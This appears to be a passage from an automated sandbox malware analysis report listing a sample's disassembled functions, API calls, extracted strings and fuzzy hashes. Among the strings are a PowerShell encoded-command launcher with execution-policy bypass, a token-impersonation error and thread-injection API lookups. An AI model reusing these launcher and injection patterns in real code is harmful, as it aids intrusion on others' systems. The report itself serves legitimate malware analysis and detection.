                                            • Instruction Fuzzy Hash: ACF08275608B90C9DA40AB12B81136AB360EB98FD0F9C8171FF8D17B1ADE3CC5518784
                                            Function 007C1FB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 007C1FD2
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • _snprintf.LIBCMT ref: 007C1FF1
                                              • Part of subcall function 007CF63C: _errno.LIBCMT ref: 007CF673
                                              • Part of subcall function 007CF63C: _invalid_parameter_noinfo.LIBCMT ref: 007CF67E
                                            • remove.LIBCMT ref: 007C1FFD
                                            • remove.LIBCMT ref: 007C2004
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                                            • String ID: %s\%s
                                            • API String ID: 1896346573-4073750446
                                            • Opcode ID: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                                            • Instruction ID: 6fd428dea99c68e68fc45dadae2a86de651a358e86a8a29c23681e91d2463dea
                                            • Opcode Fuzzy Hash: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                                            • Instruction Fuzzy Hash: CCF05E26609B90C6D300AB52B81176EA361F788FD0F98413AFF8957B5ACE7CC4528744
                                            Function 0076DA8C Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _snprintf.LIBCMT ref: 0076DB25
                                              • Part of subcall function 0077EA3C: _errno.LIBCMT ref: 0077EA73
                                              • Part of subcall function 0077EA3C: _invalid_parameter_noinfo.LIBCMT ref: 0077EA7E
                                              • Part of subcall function 00776F38: _snprintf.LIBCMT ref: 007770A5
                                            • _snprintf.LIBCMT ref: 0076DBBD
                                              • Part of subcall function 00772170: strchr.LIBCMT ref: 007721D6
                                              • Part of subcall function 00772170: _snprintf.LIBCMT ref: 0077220C
                                              • Part of subcall function 0077200C: strchr.LIBCMT ref: 00772069
                                              • Part of subcall function 0077200C: _snprintf.LIBCMT ref: 007720B3
                                            • _snprintf.LIBCMT ref: 0076DBD4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _snprintf$strchr$_errno_invalid_parameter_noinfo
                                            • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                                            • API String ID: 199363273-1250630670
                                            • Opcode ID: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                                            • Instruction ID: 8bfec20a3cc83904734541d8e5be325310fee067ba61e96e9ff7f2ef3ae84879
                                            • Opcode Fuzzy Hash: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                                            • Instruction Fuzzy Hash: 2561BD72B14B8586EB20DB62E8447AE6361F789BD8F808122EE4E57B58DF7CD905C700
                                            Function 007C00F8 Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                                            • Instruction ID: 69b245b87d20ace0db7c8d5939840572f21bc22b24b332c96f430b22638a258c
                                            • Opcode Fuzzy Hash: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                                            • Instruction Fuzzy Hash: 7A511462B00A40D6EF00EB75C449BED2361FB95B88F45912DEE0927716EF3CD546C780
                                            Function 0077FA2C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1640621425-0
                                            • Opcode ID: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                                            • Instruction ID: dae936df9891a9af00b64e00e4c5c963c600daf5205a8e8addb88380d5862ccc
                                            • Opcode Fuzzy Hash: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                                            • Instruction Fuzzy Hash: 26313762304740C6DE299E739B5422EB651FB45FE4F19C634DF6E47BA1EA7CC8828340
                                            Function 007D062C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1640621425-0
                                            • Opcode ID: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                                            • Instruction ID: 840e2e4269c4aad3a9453b1f19320dd2942ebe8164b4c18e57da3e51734653fd
                                            • Opcode Fuzzy Hash: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                                            • Instruction Fuzzy Hash: D7312C2530074087DE289E23564436EB671F794FF0F58A6269FA64BB91D77CD4928680
                                            Function 007648F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 0076493A
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                            • malloc.LIBCMT ref: 00764945
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E718
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E71D
                                            • free.LIBCMT ref: 00764A2C
                                            • free.LIBCMT ref: 00764A34
                                            • free.LIBCMT ref: 00764A40
                                            • free.LIBCMT ref: 00764A4D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$_errno$_callnewhmalloc
                                            • String ID:
                                            • API String ID: 2761444284-0
                                            • Opcode ID: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                                            • Instruction ID: b53d89707d182e88864dee4179d24d8ecfbb9646ac4f63ba972d6b491b8ee1aa
                                            • Opcode Fuzzy Hash: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                                            • Instruction Fuzzy Hash: 0F31B022714785A6DF15EFA6980472E6B99F7A9BC8F4D8034DD5A8B701EE3CC90AC305
                                            Function 007B54F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 007B553A
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • malloc.LIBCMT ref: 007B5545
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF318
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF31D
                                            • free.LIBCMT ref: 007B562C
                                            • free.LIBCMT ref: 007B5634
                                            • free.LIBCMT ref: 007B5640
                                            • free.LIBCMT ref: 007B564D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$_errno$_callnewhmalloc$AllocHeap
                                            • String ID:
                                            • API String ID: 996410232-0
                                            • Opcode ID: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                                            • Instruction ID: d45cdcfd68228d402d1f6ea2cb15a61fab87e1f162ad18f38e1ece8254779525
                                            • Opcode Fuzzy Hash: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                                            • Instruction Fuzzy Hash: FB31D222314BC986DB16EB2A68047AE6B55F799FCCF898038DD458B711EE3CC84AC700
                                            Function 007C2D70 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 94stringCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 007C31F4: strchr.LIBCMT ref: 007C322E
                                              • Part of subcall function 007C31F4: strchr.LIBCMT ref: 007C324C
                                              • Part of subcall function 007C31F4: malloc.LIBCMT ref: 007C3264
                                              • Part of subcall function 007C31F4: malloc.LIBCMT ref: 007C3271
                                              • Part of subcall function 007C31F4: rand.LIBCMT ref: 007C333D
                                            • strchr.LIBCMT ref: 007C2DD6
                                            • _snprintf.LIBCMT ref: 007C2E0C
                                              • Part of subcall function 007CF63C: _errno.LIBCMT ref: 007CF673
                                              • Part of subcall function 007CF63C: _invalid_parameter_noinfo.LIBCMT ref: 007CF67E
                                            • _snprintf.LIBCMT ref: 007C2E23
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                                            • String ID: %s&%s$?%s
                                            • API String ID: 1095232423-1750478248
                                            • Opcode ID: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                                            • Instruction ID: 40a7e14b6208fdd17939be93cb33a5e536394c77bfe0e7079a219b8f1b6084d6
                                            • Opcode Fuzzy Hash: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                                            • Instruction Fuzzy Hash: C9419062614E80D1DA119F2EE1497E8A3B1FF98B85F08552ADF4967B21EF38D1B3C340
                                            Function 007DAC98 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                            • String ID:
                                            • API String ID: 2998201375-0
                                            • Opcode ID: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                                            • Instruction ID: d208074887ed8bdeecdf155dc7c726071f1ca070fb527d663bf349a56211b256
                                            • Opcode Fuzzy Hash: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                                            • Instruction Fuzzy Hash: FF31A03231578096DB208F25E580729BB76FB89FD1F284227EB8957B69DB3CC841C701
                                            Function 0076F064 Relevance: 7.6, APIs: 5, Instructions: 58fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 0076F085
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                            • free.LIBCMT ref: 0076F0C0
                                            • fwrite.LIBCMT ref: 0076F101
                                            • fclose.LIBCMT ref: 0076F109
                                            • free.LIBCMT ref: 0076F116
                                              • Part of subcall function 0077E644: _errno.LIBCMT ref: 0077E664
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$free$_callnewhfclosefwritemalloc
                                            • String ID:
                                            • API String ID: 1696598829-0
                                            • Opcode ID: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                                            • Instruction ID: 727e48220a8fc11a8469591ca334b17eb7274d9276cf13c229a23c8a42258b77
                                            • Opcode Fuzzy Hash: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                                            • Instruction Fuzzy Hash: ED11A751708B40C1DE10F762F55926E6392EB96FE4F488235EE6E4BB8ADE3CC5058B40
                                            Function 007899EC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 007899FD
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • __doserrno.LIBCMT ref: 007899F5
                                              • Part of subcall function 007810A8: _getptd_noexit.LIBCMT ref: 007810AC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno_errno
                                            • String ID:
                                            • API String ID: 2964073243-0
                                            • Opcode ID: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                                            • Instruction ID: c7463fc6d34d2d1fbaedb2d42d40fbba2468055fcc40b4a11983fb27c7376d50
                                            • Opcode Fuzzy Hash: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                                            • Instruction Fuzzy Hash: 3AF06DB2B9168889EF093F65C89937C66519B91B72FDAD305D72A073D1CB3C4842D722
                                            Function 007DA5EC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 007DA5FD
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • __doserrno.LIBCMT ref: 007DA5F5
                                              • Part of subcall function 007D1CA8: _getptd_noexit.LIBCMT ref: 007D1CAC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno_errno
                                            • String ID:
                                            • API String ID: 2964073243-0
                                            • Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                                            • Instruction ID: 38ad7d2bd1522ec40edf2e8621500ab3a2363927dbada9c96582c423b3e3888e
                                            • Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                                            • Instruction Fuzzy Hash: 49F0F672B11604D5DF096B34C89532C2271BB50B32FE94703D53D073E1DB3C84428722
                                            Function 00775228 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116stringCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 007753EC: malloc.LIBCMT ref: 00775408
                                            • strrchr.LIBCMT ref: 007752ED
                                            • _snprintf.LIBCMT ref: 0077539B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _snprintfmallocstrrchr
                                            • String ID: Failed to impersonate token: %d$t permissions in process: %d
                                            • API String ID: 3587327836-1492073275
                                            • Opcode ID: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                                            • Instruction ID: 20118b00d32b4f46d1d09a4c21e07f879ce9f6a81db5a39461e1d36e4cd4fcb6
                                            • Opcode Fuzzy Hash: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                                            • Instruction Fuzzy Hash: 2441E320B0468186EF14FB22A91872F6792B789FD4F848120EE4E4B769CF7CD452C700
                                            Function 007C2818 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93sleeppipeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreatePipe.KERNEL32 ref: 007C28A3
                                            • GetStartupInfoA.KERNEL32 ref: 007C28AD
                                            • Sleep.KERNEL32 ref: 007C28F4
                                              • Part of subcall function 007C48D8: GetTickCount.KERNEL32 ref: 007C48F1
                                              • Part of subcall function 007C48D8: GetTickCount.KERNEL32 ref: 007C4932
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountTick$CreateInfoPipeSleepStartup
                                            • String ID: h
                                            • API String ID: 1809008225-2439710439
                                            • Opcode ID: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                                            • Instruction ID: 24d558da361af74ade1ef23fac273cd9ec9fdcd0f4a91abd3ebb69380c7d4e11
                                            • Opcode Fuzzy Hash: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                                            • Instruction Fuzzy Hash: A9416732604B889AD710CF65E844B8EB7B5F388798F504219EF9C53B68DF78D646CB40
                                            Function 007CE1D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AccountInformationLookupToken_snprintf
                                            • String ID: %s\%s
                                            • API String ID: 2107350476-4073750446
                                            • Opcode ID: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                                            • Instruction ID: f724fb2bf7119683d91b2c4babf3b52b21094bad6336d1c4f1a9760aa0f48ec6
                                            • Opcode Fuzzy Hash: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                                            • Instruction Fuzzy Hash: B5212D36204FC1D6DB24CF61E8447DA6369F788B88F44812AEA8D57B58DF3CC60AC740
                                            Function 007C4224 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: RtlCreateUserThread$ntdll.dll
                                            • API String ID: 1646373207-2935400652
                                            • Opcode ID: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                                            • Instruction ID: 151fa939042dbd050a795a3aca16ac1bb234487d55f5baad6b0e607bde06fbac
                                            • Opcode Fuzzy Hash: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                                            • Instruction Fuzzy Hash: D5011B32618B9482DB20DF51F884749B7A8F799B80F998179EA9D43B14DF38D596CB00
                                            Function 007C3C0C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: NtQueueApcThread$ntdll
                                            • API String ID: 1646373207-1374908105
                                            • Opcode ID: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                                            • Instruction ID: 7d67f3620b1b6b66b14aeb94d762f710af885435cbb571365b7d3e38d6efcb36
                                            • Opcode Fuzzy Hash: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                                            • Instruction Fuzzy Hash: 3401A225709B8182DB108B16F84475EA364F789BD0F548529DE5C43B55DF3CD5528700
                                            Function 007C0C64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: IsWow64Process$kernel32
                                            • API String ID: 1646373207-3789238822
                                            • Opcode ID: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                                            • Instruction ID: e3879703a382f1bcd277bb4d83148ab682561692d050ac4557ad85fb15a26e95
                                            • Opcode Fuzzy Hash: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                                            • Instruction Fuzzy Hash: AFE02660B2A781C2EF14CB15F8807656324EB8C780F481058DA4F06362EF3CD59ACB50
                                            Function 007C20E4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: Wow64RevertWow64FsRedirection$kernel32
                                            • API String ID: 1646373207-3900151262
                                            • Opcode ID: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                                            • Instruction ID: 3e4792111a6d47e97431c1350d55c1b0687d2dd5ae2f2f95a48a0f5d2659fb20
                                            • Opcode Fuzzy Hash: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                                            • Instruction Fuzzy Hash: 64D0A710F5768981FE089B92FC447641354AB4EF40F4C10A4891E07362EE7CD58BC310
                                            Function 007C20AC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: Wow64DisableWow64FsRedirection$kernel32
                                            • API String ID: 1646373207-736604160
                                            • Opcode ID: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                                            • Instruction ID: 979da9c5d23ce8cf236b834b7210ad28907d3304424037716a9863ce5322f0ec
                                            • Opcode Fuzzy Hash: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                                            • Instruction Fuzzy Hash: 96D0A710F5778981FE049B91FC447646314AB4DB80F4C10A9891E06362EE3CD5CBC310
                                            Function 0077B3C0 Relevance: 6.1, APIs: 4, Instructions: 140COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                            • Instruction ID: 4359f1aa0db0477e395f1ea04bda7e71f3aa9fccc3aa47ec708e012d54abe99e
                                            • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                            • Instruction Fuzzy Hash: 80519172B45680DBDB18CF19E98536C33A0F799BE5F248129DA1D4B361CB3CD491CB51
                                            Function 007CBFC0 Relevance: 6.1, APIs: 4, Instructions: 140COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                            • Instruction ID: 484e762a75ea639432d2fa16db44154f8fe086ac3f91f94b8d6c40b19a249011
                                            • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                            • Instruction Fuzzy Hash: 7151C072A45644CBEB25CF19E995B7833A1F758BA5F28413EDA0D4B361CB3CD882CB40
                                            Function 00772170 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 007725F4: strchr.LIBCMT ref: 0077262E
